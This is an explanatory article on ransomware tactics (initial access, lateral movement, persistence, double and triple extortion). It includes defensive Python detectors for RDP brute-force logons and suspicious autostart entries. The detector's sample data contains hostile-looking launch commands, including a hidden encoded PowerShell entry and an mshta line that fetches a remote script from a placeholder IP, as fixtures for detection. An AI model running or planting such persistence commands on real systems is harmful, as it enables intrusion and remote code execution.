How Modern Ransomware Exploits System Vulnerabilities

Ransomware attacks were once thought to follow a four-step pattern: exploit vulnerabilities, move laterally through a system, encrypt data, and demand payment. Recent research, however, has shown that attackers are going a step further: once they gain unauthorized access to a system, they leverage vulnerable legitimate infrastructure to maintain continuous access, using legitimate remote management tools that blend seamlessly into normal operations. Because attackers scan continually for vulnerabilities, waiting for a confirmed compromise before acting is no longer a safe option. Organizations today must combine vulnerability management with cutting-edge cyber threat intelligence to identify their specific risks and center their efforts on them. 24/7 monitoring is also key; a strong security operations center (SOC) can detect subtle changes and take immediate action to stop threats in their tracks.

Initial System and Network Vulnerability Exploitation

Attackers first gain unauthorized access to systems and software by targeting exposed services or relying on phishing schemes. A common entry point is unpatched operating systems and software vulnerabilities. Software vendors regularly release updates to address security flaws, but organizations sometimes delay or skip them, leaving their systems exposed. Attackers scan networks for these vulnerabilities, use exploit code to gain remote access, and then execute malicious code. Exposed remote access services, such as remote desktop protocol (RDP) and virtual private networks (VPNs), are another concern, as they can be easily exploited when they are left under-protected. Attackers commonly use stolen credentials or brute-force attacks to log in. If multifactor authentication isn’t enabled, a valid username and password is all they need to operate undetected. If network resources are improperly secured, ports are left open, or cloud services are misconfigured, attackers can easily exploit these weaknesses. These vulnerabilities underscore the importance of protecting one’s organization through endpoint security, identity and access controls, ongoing vulnerability management, managed detection and response, and insurance-approved incident response.
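The brute-force logins against exposed RDP described above leave a distinctive trace in the Windows Security log: a burst of failed logons (event 4625, logon type 10) from one source, sometimes followed by a success (event 4624). The following is an added example, not code from the original article: a small detector over constructed sample records. The pipe-separated record format and the sample addresses (RFC 5737 documentation ranges) are assumptions for this example; a real deployment would feed it from the SIEM's parsed events.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, not real telemetry. Record format (an assumption
# for this example): timestamp|event_id|logon_type|account|source_ip
# 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive (RDP)
SAMPLE_LOG = """\
2024-05-01T10:00:01|4625|10|administrator|203.0.113.7
2024-05-01T10:00:03|4625|10|administrator|203.0.113.7
2024-05-01T10:00:04|4625|10|admin|203.0.113.7
2024-05-01T10:00:06|4625|10|backup|203.0.113.7
2024-05-01T10:00:08|4625|10|svc_sql|203.0.113.7
2024-05-01T10:00:09|4625|10|jsmith|203.0.113.7
2024-05-01T10:00:15|4624|10|jsmith|203.0.113.7
2024-05-01T10:05:00|4625|10|mlee|198.51.100.4
2024-05-01T10:30:00|4624|10|mlee|198.51.100.4
2024-05-01T11:00:00|4624|2|mlee|127.0.0.1
"""


def parse_events(text):
    """Turn the pipe-separated sample records into dicts with typed fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, account, src = line.split("|")
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "account": account,
            "src": src,
        })
    return events


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Return {source_ip: finding} for every source with at least `threshold`
    failed RDP logons inside `window`. The finding records which accounts were
    tried and whether a successful logon followed the burst: a guessed password
    that worked is the case that needs an immediate response."""
    rdp = [e for e in events if e["logon_type"] == 10]
    by_src = defaultdict(list)
    for e in rdp:
        by_src[e["src"]].append(e)

    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["event_id"] == 4625]
        # Sliding window: for each failure, count the failures that follow it
        # within `window`; the first burst that reaches the threshold is reported.
        for i in range(len(failures)):
            j = i
            while j < len(failures) and failures[j]["time"] - failures[i]["time"] <= window:
                j += 1
            if j - i >= threshold:
                later_success = [e for e in evs
                                 if e["event_id"] == 4624 and e["time"] > failures[i]["time"]]
                findings[src] = {
                    "failures": j - i,
                    "accounts": sorted({e["account"] for e in failures[i:j]}),
                    "success_after_burst": later_success[0]["account"] if later_success else None,
                }
                break
    return findings


if __name__ == "__main__":
    for src, finding in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(src, finding)
```

The one-failure source (198.51.100.4) stays below the threshold and is not reported, which keeps ordinary typos out of the alert queue; the source that cycles through several accounts and then logs in as one of them is reported with the account that succeeded, so responders know which credential to disable first.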

Privilege Escalation and Lateral Movement

The next step for attackers is to exploit vulnerabilities to obtain higher-level permissions. For instance, they may exploit application flaws to gain administrative privileges and unrestricted access to key systems. Once they have the credentials and privileges they are after, they can start moving laterally from one system to another within the network, accessing resources and preparing for their endgame. They can also discover the countermeasures security teams typically use to respond to an attack and leverage legitimate RDP and other tools to blend in with normal operations and evade detection.

Maintaining Persistence and Evading Detection

Once ransomware attackers gain entry, their aim is to maintain their foothold within a system, a goal they typically achieve by installing backdoor malware that survives a reboot. There are many ways to run malicious code every time Windows starts, including startup folders, Run and RunOnce registry keys, and scheduled tasks. Startup folders are folders whose contents run automatically at login; Microsoft Teams, for example, typically starts this way, and attackers can ensure their hidden ransomware loader starts the same way. The Run and RunOnce registry keys list programs that Windows launches automatically at startup, so malware that adds itself to them is launched too. Finally, Windows Task Scheduler runs programs automatically at specific times or when specific conditions are met, and attackers can add malicious tasks to its list.
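Because those three autostart locations are also used by legitimate software (the Teams case above), a defender's job is to enumerate them and separate ordinary entries from ones that warrant investigation. The following is an added example, not code from the original article: it parses the shape of a `reg export` .reg file for the Run and RunOnce keys, takes startup-folder and scheduled-task entries as plain (name, command) pairs, and flags commands that use a script host with an encoded, hidden or remote payload, that run from a temp or downloads directory, or that borrow a Windows system binary's name outside C:\Windows. All sample data is constructed; on a real host the inputs would come from the registry export, the Startup folder listing and the task list.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample, not a real export: the shape of a `reg export` .reg file
# for the two per-user autostart keys named in the article.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"com.squirrel.Teams.Teams"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\Teams\\Update.exe --processStart \"Teams.exe\""
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"Updater"="powershell.exe -w hidden -enc SQBFAFgA"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"svchost"="C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe"
'''

# Constructed (name, command) pairs standing in for a Startup folder listing and
# for scheduled-task actions.
SAMPLE_STARTUP_FOLDER = [
    ("Teams.lnk", r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe"),
    ("update.vbs", r"wscript.exe C:\Users\alice\Downloads\update.vbs"),
]
SAMPLE_SCHEDULED_TASKS = [
    ("OneDrive Standalone Update Task",
     r"C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe"),
    ("WindowsUpdateCheck", r"mshta.exe http://198.51.100.4/u.hta"),
]

REG_KEY = re.compile(r"^\[(.+)\]$")
REG_VALUE = re.compile(r'^"(.+?)"="(.*)"$')

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}


def parse_reg_export(text):
    """Return (key_name, value_name, command) for each REG_SZ value under each
    key in a .reg export; backslashes and quotes are escaped in that format."""
    entries, key = [], None
    for line in text.splitlines():
        m = REG_KEY.match(line)
        if m:
            key = m.group(1)
            continue
        m = REG_VALUE.match(line)
        if m and key:
            name, data = m.groups()
            data = data.replace('\\"', '"').replace("\\\\", "\\")
            entries.append((key.rsplit("\\", 1)[-1], name, data))
    return entries


def executable_of(command):
    """Return the program at the head of a command line, quoted or bare."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ", 1)[0]


def classify(command):
    """Return the list of reasons an autostart command deserves review (empty if none)."""
    exe = PureWindowsPath(executable_of(command))
    name, low = exe.name.lower(), command.lower()
    reasons = []
    if name in SCRIPT_HOSTS and re.search(
            r"-(enc|encodedcommand|w hidden|windowstyle hidden)\b|https?://", low):
        reasons.append("script host with encoded, hidden or remote payload")
    if re.search(r"\\(temp|downloads)\\", low):
        reasons.append("runs from a temp or downloads directory")
    if name in SYSTEM_NAMES and not str(exe).lower().startswith("c:\\windows\\"):
        reasons.append("system binary name outside C:\\Windows")
    return reasons


def audit_autostarts(reg_text, startup_folder, scheduled_tasks):
    """Combine the three autostart sources and return the entries that were flagged."""
    entries = [("Registry " + key, n, c) for key, n, c in parse_reg_export(reg_text)]
    entries += [("Startup folder", n, c) for n, c in startup_folder]
    entries += [("Scheduled task", n, c) for n, c in scheduled_tasks]
    findings = []
    for source, name, cmd in entries:
        reasons = classify(cmd)
        if reasons:
            findings.append({"source": source, "name": name, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_autostarts(SAMPLE_REG_EXPORT, SAMPLE_STARTUP_FOLDER, SAMPLE_SCHEDULED_TASKS):
        print(f["source"], "|", f["name"], "|", "; ".join(f["reasons"]))
```

The Teams and OneDrive entries pass because a user-profile install path on its own is not a signal; the flagged entries are the ones that combine an autostart location with behaviour legitimate installers rarely need, and the reasons are returned with each finding so an analyst can see why the entry was raised rather than having to rerun the heuristics by hand.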

Data Encryption, Exfiltration, and Extortion

Instead of relying exclusively on ransomware’s typical method of encrypting files and demanding payment to decrypt them, many groups are using more sophisticated tactics, such as exfiltration and extortion. In many recent ransomware cases, attackers have exfiltrated data to apply pressure and extort payment from victims by threatening reputational damage or legal consequences. This process is known as double extortion. Recently, attackers have added a new layer of pressure in a process known as “triple extortion.” Here, they target the individuals whose data was exfiltrated, such as clients, employees, or vendors. Through these actions, they demonstrate that the financial and reputational damage from ransomware can extend well beyond corporate boundaries. Some of the most sophisticated attacks additionally include tactics such as DDoS attacks, social engineering, and public shaming via dedicated leak sites.

Ransomware attacks have become increasingly sophisticated, with many attackers threatening organizations by exfiltrating data. Companies wishing to prevent attacks need to invest in a robust cybersecurity strategy. Endpoint security, identity and access controls, ongoing vulnerability management, managed detection and response, and insurance-approved incident response can all help organizations keep their data and that of their clients and stakeholders safe from future threats.